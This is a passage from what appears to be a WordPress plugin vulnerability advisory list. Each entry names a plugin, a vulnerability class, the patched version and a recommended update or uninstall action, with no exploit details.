Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Conversador

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Read More Without Refresh

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: MW WP Form

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 5.0.2
Recommended Action: Update to version 5.0.2, or a newer patched version

Plugin: Blogger Importer

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.6
Recommended Action: Update to version 0.6, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.5.3
Recommended Action: Update to version 4.5.3, or a newer patched version

Plugin: Post Category Image With Grid and Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Simple File List

Vulnerability: Arbitrary File Deletion
Patched Version: 4.2.8
Recommended Action: Update to version 4.2.8, or a newer patched version

Plugin: HMS Testimonials

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Premium Courses & eLearning with Paid Memberships Pro for LearnDash, LifterLMS, Sensei LMS & TutorLMS

Vulnerability: Courses for Membership Add On <= 1.2.3
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: User meta shortcodes

Vulnerability: Improper Access Control
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Premmerce Redirect Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘loadSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WordPress RokBox

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Mobile Detector

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: CookieYes – Cookie Banner for Cookie Consent (Easy to setup GDPR/CCPA Compliant Cookie Notice)

Vulnerability: Authenticated Stored Cross-Site Scripting and Authorization Bypass
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Launcher: Coming Soon & Maintenance Mode

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Insecure Direct Object Reference to Comment Rating Increase/Decrease
Patched Version: 7.6.4
Recommended Action: Update to version 7.6.4, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Gutenberg Blocks for Post Grid <= 2.4.9
Patched Version: 2.4.10
Recommended Action: Update to version 2.4.10, or a newer patched version

Plugin: Download Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.7.95
Recommended Action: Update to version 2.7.95, or a newer patched version

Plugin: Social Metrics

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Caddy – Smart Side Cart for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.8
Recommended Action: Update to version 1.9.8, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.0.3.4
Recommended Action: Update to version 6.0.3.4, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Missing Authorization to User Import
Patched Version: 5.5.2
Recommended Action: Update to version 5.5.2, or a newer patched version

Plugin: YOP Poll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.7.4
Recommended Action: Update to version 5.7.4, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Missing Authorization on openai_settings_option_callback
Patched Version: 4.4.8
Recommended Action: Update to version 4.4.8, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: WP MLM SOFTWARE PLUGIN

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Greenshift – animation and page builder blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.8.9
Recommended Action: Update to version 4.8.9, or a newer patched version

Plugin: Ajax Search Pro

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.19
Recommended Action: Update to version 4.19, or a newer patched version

Plugin: GMAce

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Contacts Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid

Vulnerability: Cross-Site Request Forgery in rttpg_spare_me
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Donation Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Express Checkout (Accept PayPal Payments Easily)

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via pec_coupon[code]
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Quick Paypal Payments

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 5.7.26
Recommended Action: Update to version 5.7.26, or a newer patched version

Plugin: WP Safe Search

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_bulk_delete_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Authenticated SQL Injection
Patched Version: 6.60
Recommended Action: Update to version 6.60, or a newer patched version

Plugin: Awesome Filterable Portfolio

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Share Buttons Adder

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: iframe

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Download Manager

Vulnerability: Contributor+ Cross-Site Scripting
Patched Version: 3.2.47
Recommended Action: Update to version 3.2.47, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Arbitrary File Write
Patched Version: 3.37.15
Recommended Action: Update to version 3.37.15, or a newer patched version

Plugin: Quick Paypal Payments

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.7.26
Recommended Action: Update to version 5.7.26, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: CSV Injection
Patched Version: 1.3.73
Recommended Action: Update to version 1.3.73, or a newer patched version

Plugin: Joli Table Of Contents

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.16.5
Recommended Action: Update to version 5.16.5, or a newer patched version

Plugin: Wu-Rating

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Template Designer – WP HTML Mail

Vulnerability: HTML Injection
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Real WYSIWYG

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Theme Tuner

Vulnerability: Remote File Inclusion
Patched Version: 0.8
Recommended Action: Update to version 0.8, or a newer patched version

Plugin: Chained Quiz

Vulnerability: No subtitle
Patched Version: 1.1.9.1
Recommended Action: Update to version 1.1.9.1, or a newer patched version

Plugin: Sticky Buttons – floating buttons builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.0.29
Recommended Action: Update to version 9.0.29, or a newer patched version

Plugin: PopCash Code Integration Tool

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Scripting via s parameter
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Authentication Bypass to Administrator
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.3.29
Recommended Action: Update to version 2.3.29, or a newer patched version

Plugin: Zotpress

Vulnerability: SQL Injection
Patched Version: 6.1.3
Recommended Action: Update to version 6.1.3, or a newer patched version

Plugin: WP STAGING WordPress Backup Plugin – Migration Backup Restore

Vulnerability: Sensitive Information Exposure
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Template Conditions Modification
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Event Calendar – Calendar

Vulnerability: Missing Authorization to Event Modification
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: ThinkIT WP Contact Form

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: WP Symposium

Vulnerability: Arbitrary File Upload
Patched Version: 15.1
Recommended Action: Update to version 15.1, or a newer patched version

Plugin: B2BKing — Ultimate WooCommerce Wholesale and B2B Solution — Wholesale Order Form, Catalog Mode, Dynamic Pricing & More

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Price Modification
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: WPS Limit Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.6.1
Recommended Action: Update to version 1.4.6.1, or a newer patched version

Plugin: Duplicator Pro

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 4.5.14.2
Recommended Action: Update to version 4.5.14.2, or a newer patched version

Plugin: Legal Pages – Privacy Policy, Terms & Conditions, GDPR, CCPA, and Cookie Notice Generator

Vulnerability: Missing Authorization on ‘deleteLegalTemplate’
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Subscribe Sidebar plugin by Blubrry

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SW Ajax WooCommerce Search

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Dean’s FCKEditor

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Seriously Simple Podcasting

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.19.1
Recommended Action: Update to version 2.19.1, or a newer patched version

Plugin: AJAX Store Locator

Vulnerability: Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PDF Generator for WordPress – Create & Customize PDF for Posts, Pages and WooCommerce Products

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Ultimate WooCommerce CSV Importer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Header Footer Code Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.17
Recommended Action: Update to version 1.1.17, or a newer patched version

Plugin: WP-TopBar

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.11
Recommended Action: Update to version 2.2.11, or a newer patched version

Plugin: ARMember Premium – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Missing Authorization
Patched Version: 5.9.3
Recommended Action: Update to version 5.9.3, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via get_inline_svg()
Patched Version: 3.16.5
Recommended Action: Update to version 3.16.5, or a newer patched version

Plugin: SEO by 10Web

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Email Marketing Plugin – WP Email Capture

Vulnerability: Information Exposure via wp_email_capture_options_process
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: Malware Finder

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary Post Deletion in listing_task
Patched Version: 7.5.5
Recommended Action: Update to version 7.5.5, or a newer patched version

Plugin: Easy Testimonials

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Hostel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Manage Bookings
Patched Version: 1.1.5.2
Recommended Action: Update to version 1.1.5.2, or a newer patched version

Plugin: Gravity PDF

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Sensitive Information Exposure via CSV Files
Patched Version: 3.3.27
Recommended Action: Update to version 3.3.27, or a newer patched version

Plugin: Download Manager

Vulnerability: Insufficient Authorization to Information Disclosure
Patched Version: 3.2.71
Recommended Action: Update to version 3.2.71, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: SQL Injection
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: CMP – Coming Soon & Maintenance Plugin by NiteoThemes

Vulnerability: Coming Soon & Maintenance Plugin <= 4.0.18
Patched Version: 4.0.19
Recommended Action: Update to version 4.0.19, or a newer patched version

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Authenticated (Vendor+) SQL Injection
Patched Version: 3.7.13
Recommended Action: Update to version 3.7.13, or a newer patched version

Plugin: Catch Breadcrumb

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: WP AutoComplete Search

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPCafe – Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: PayPal Brasil para WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: WP Social Bookmarking Light

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.10
Recommended Action: Update to version 1.7.10, or a newer patched version

Plugin: Qyrr – simply and modern QR-Code creation

Vulnerability: Cross-Site Scripting
Patched Version: 0.8
Recommended Action: Update to version 0.8, or a newer patched version

Plugin: WP fade in text news

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 12.1
Recommended Action: Update to version 12.1, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Visual CSS Style Editor

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: FLOWFACT WP Connector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization in ‘deleteCssAndJsCacheToolbar’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: User Activity Log

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: PHP Object Injection
Patched Version: 2.5.8
Recommended Action: Update to version 2.5.8, or a newer patched version

Plugin: Hot Files: File Sharing and Download Manager Plugin

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AccessAlly

Vulnerability: Information Exposure
Patched Version: 3.5.7
Recommended Action: Update to version 3.5.7, or a newer patched version

Plugin: WP Maintenance Mode & Site Under Construction

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: AGP Font Awesome Collection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: Store Locator WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Geo Mashup

Vulnerability: < 1.10.4
Patched Version: 1.10.4
Recommended Action: Update to version 1.10.4, or a newer patched version

Plugin: WP Brutal AI

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Rank Math SEO PRO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.36
Recommended Action: Update to version 3.0.36, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.7.11.1
Recommended Action: Update to version 2.7.11.1, or a newer patched version

Plugin: Safe SVG

Vulnerability: Denial of Service
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Easy Table

Vulnerability: Authenticated Stored Cross-Site Scripting via easy-table-test-area parameter
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Authenticated (Author+) PHP File Creation to Remote Code Execution
Patched Version: 7.9.9
Recommended Action: Update to version 7.9.9, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated SQL Injection
Patched Version: 5.16.6
Recommended Action: Update to version 5.16.6, or a newer patched version

Plugin: WP YouTube Live

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: SQL Injection
Patched Version: 3.3.21.2
Recommended Action: Update to version 3.3.21.2, or a newer patched version

Plugin: Click To Tweet

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Weight Based Shipping

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Changes
Patched Version: 5.5.0
Recommended Action: Update to version 5.5.0, or a newer patched version

Plugin: OptionTree

Vulnerability: Object Injection Bypass
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Advance Menu Manager

Vulnerability: Authenticated (Subscriber+) Menu Creation/Deletion
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Reflected Cross-Site Scripting via ‘form-field-id’, ‘edit-fid’, ‘id’, ‘name’, ‘type’, ‘description’ Parameters
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Unauthenticated Backup Download
Patched Version: 1.4.7.1
Recommended Action: Update to version 1.4.7.1, or a newer patched version

Plugin: WishSuite – Wishlist for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Raygun

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: OneLogin SAML SSO

Vulnerability: Use of Vulnerable Component
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Arbitrary File Overwrite
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Flickr Gallery

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Disable Comments – Remove Comments & Stop Spam [Multi-Site Support]

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: Unauthenticated Stored Cross-Site Scripting via IP
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail For Excerpts

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ACF: Better Search

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Simple Image Manipulator

Vulnerability: Remote File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: No subtitle
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: WordPress.com Editing Toolkit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.79150
Recommended Action: Update to version 3.79150, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: 4.1.5.2
Patched Version: 4.1.5.3
Recommended Action: Update to version 4.1.5.3, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Authenticated Privilege Escalation
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.19
Recommended Action: Update to version 1.9.19, or a newer patched version

Plugin: GD Security Headers

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Custom Field Template

Vulnerability: Cross-Site Request Forgery via Plugin Options Update
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: Advanced Shipment Tracking for WooCommerce

Vulnerability: Cross-Site Request Forgery via paginate_shipping_provider_list and filter_shipping_provider_list
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: IP Blacklist Cloud

Vulnerability: Directory Traversal
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: wpml

Vulnerability: Cross-Site Scripting
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Better WordPress Google XML Sitemaps (support Sitemap Index, Multi-site and Google News)

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Hotel Booking

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘addRedirectRule’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WP User Manager – User Profile Builder & Membership

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Image Map Pro – Drag-and-drop Builder for Interactive Images – Lite

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: QuickSwish – WooCommerce Product Quick View

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.4.9.1
Recommended Action: Update to version 5.4.9.1, or a newer patched version

Plugin: Coming soon and Maintenance mode

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.3
